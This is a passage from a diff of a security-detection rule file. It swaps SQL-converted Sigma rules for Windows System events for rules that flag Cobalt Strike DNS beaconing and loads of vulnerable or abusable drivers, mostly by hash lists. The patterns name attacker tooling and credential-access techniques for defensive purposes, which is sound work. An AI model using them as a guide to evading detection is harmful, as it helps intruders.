Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' 
ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml" + "filename": "dns_query_win_remote_access_software_domains.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE 
'%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", + "status": "experimental", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" - ], - "filename": "win_system_vul_cve_2020_1472.yml" - }, - { - "title": "Volume Shadow Copy Mount", - "id": "f512acbf-e662-4903-843e-97ce4652b740", - "status": "test", - "description": "Detects volume shadow copy mount via windows event log", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "falsepositives": [ - "Legitimate use of volume shadow copy mounts (backups maybe)." 
- ], - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Ntfs' AND EventID = '98' AND DeviceName LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" ], - "filename": "win_system_volume_shadow_copy_mount.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "status": "experimental", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.collection", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' 
OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Windows Pcap Drivers", - "id": 
"7b687634-ab20-11ea-bb37-0242ac130002", - "status": "test", - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "author": "Cian Heasley", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" ], - "filename": "win_system_pcap_drivers.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + 
"id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", - "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "title": "Process Hacker and System Informer Driver Load", + "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "status": "experimental", + "description": "Detects the load of drivers used by Process Hacker and System Informer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - 
"attack.g0010", - "attack.t1543.003" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate user of process hacker or system informer by low level developers or system administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR 
Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138'))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_process_hacker.yml" }, { - "title": "Potential RDP Exploit CVE-2019-0708", - "id": "aaa5b30d-f418-420b-83a0-299cb6024885", - "status": "test", - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "status": "experimental", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - 
"attack.t1210", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Bad connections or network interruptions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' 
ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE 
